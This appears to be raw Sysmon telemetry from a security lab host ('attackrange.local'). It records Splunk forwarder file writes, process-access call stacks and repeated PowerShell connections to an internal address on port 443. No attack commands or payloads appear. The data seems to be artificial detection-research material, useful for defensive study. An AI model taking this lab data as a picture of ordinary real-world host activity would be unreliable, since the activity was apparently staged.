AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:30.491{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=949DE58F2D192594FF5DCBB6BDB0DA3A,SHA256=D91442144086EEB5A36C6E16C171BF9187E1CC2C0282971E2E4B00FB09AA460C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:30.126{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=057C4CB2F43B5FA970252BEF3C4ED914,SHA256=772B4CE408A88BEA7A10A59486E7B6B1FB0C3EF6D07C0E72C16C48A60B6D6C2D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:31.956{B81B27B7-2BC4-612D-7CF4-01000000C801}4056ATTACKRANGE\REED_SCHMIDTC:\Windows\system32\WindowsPowerShell\v1.0\PowerShell_ISE.exeC:\Users\reed_schmidt\AppData\Local\Microsoft_Corporation\PowerShell_ISE.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\4056.xml~RF717c7c37.TMPMD5=7FFA55FF6AC84742FC67B49B83BE3F12,SHA256=786CB96E30E42C16784374E9E5E14298976752E69CFAAF7FCB2ED016D9E3B6BB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:55.425{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56528-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:31.156{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF2E7962325E9A53622C4DFE1B99E10C,SHA256=7E75C6D68CEA177A5A7286654EB4FF8DC79679EA5A4B8AE45D055E9F6D7BE09A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:32.839{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:32.839{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:32.839{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000035083868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:57.138{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56529-false10.0.1.12-8000- 23542300x800000000000000035083867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:32.189{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04786D9F799A3D4B3F226F1190EE4242,SHA256=ABC420682DF8F81D14F79C6185034D1650DB7F3BE575075FB35D949A4BBA9849,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:33.207{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F26AF8EBC6EC126DBD3C3FE96081EA6,SHA256=9C2465CB86D897207B2FE14E51424EDB15F5D33D8625C3B1ED3E9AD8C67205B4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083873Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:34.238{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4517D521B812FB6780228A4F419A942,SHA256=53D13AA1A1D394F499EF028CB452073932D2823FADA75E2B6BEC17D83EEDA07A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083876Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:00.438{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56530-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083875Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:35.436{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=93265C843E53415486967CD3E8913810,SHA256=7DDBE4259D6E26F7BC3A70BCAF420055E436EF49406CF4819D2BC9D61D8309CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083874Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:35.252{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2824CB59307E5C5E39325E4AA79F741C,SHA256=D0381A1E3F8574980C64DF19CD0D8C0E8363766FBE91B57A98EA461C643146E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:36.383{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=5196218587CC96E3BC5180EA232C6C8C,SHA256=566EE483F29FF3F51E0BD5629B8AEA70E8DD13E1561FAFA6870054277F059415,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:36.288{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1F4F8574D8AFCAF60EB7EF3F70C86696,SHA256=3E02A6CB4FA8F9C67661FE19F01FEC62EB8215928A0D0789508A19923B4CFDBF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:37.384{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=465A7592170DA8BE68C1E6743FCBCB5D,SHA256=9D187375206CBED3887DFB5A5FDD825FFDD90156230C2E6454AC8B32DF8DEF92,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:02.233{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56531-false10.0.1.12-8000- 23542300x800000000000000035083880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:38.402{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=43D2B458EBA77AE43B24F7DC40B2690C,SHA256=AE545C4F5932D35C251028C96A13BB49996CEC6F2CBD1B5603AB56EED3BE7580,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:39.417{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0D4B32402F14DF9BC84B26667B93492,SHA256=11390C0DF20F2ECCA6022747F1060134C0EDA546ED0CF7A1F346A51749780EB8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:08:05.447{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56532-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:40.447{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=442B55FD99564A5E51476ED05F4FA106,SHA256=EDC031C73B7CA662B24F6523AC8A0A48BD247CA23A60D862D0C6D623FE0F90EF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:40.447{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C817F24D9E87E98B7811D8DA50BB856C,SHA256=F1BBB358906399400C1E08A1815FB70AE25E981D9C14B95FBFFE5885BD518942,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:41.462{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E542C92BBE0D46644BA0D406D60419EC,SHA256=6473585294BCA0E0EF6D2B9CD2280A848A6A0EEB80E778032BEE9ABA9B5850E1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:42.478{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39C587694AE9CE38ADE039E351DF5FF1,SHA256=9B68578396C74A578604E32497B6BF0858D903A6A3D0DFB46F61A0734CECB937,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:43.797{B81B27B7-4D6F-613A-2490-03000000C801}36125172C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083896Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:43.644{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D6F-613A-2490-03000000C801}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083895Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:43.644{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083894Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:43.644{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083893Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:43.644{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083892Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:43.644{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083891Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:43.644{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4D6F-613A-2490-03000000C801}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083890Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:43.644{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4D6F-613A-2490-03000000C801}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035083889Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:43.630{B81B27B7-4D6F-613A-2490-03000000C801}3612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035083888Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:43.497{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=284A6F1868E180BF864A92C224368534,SHA256=9CA80F69BA5684C44CB7F5D108C78012F2BF0AF14D17CDE17F766FD576A85082,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035083918Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.911{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4D70-613A-2690-03000000C801}6056C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083917Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:07:44.911{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083916Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 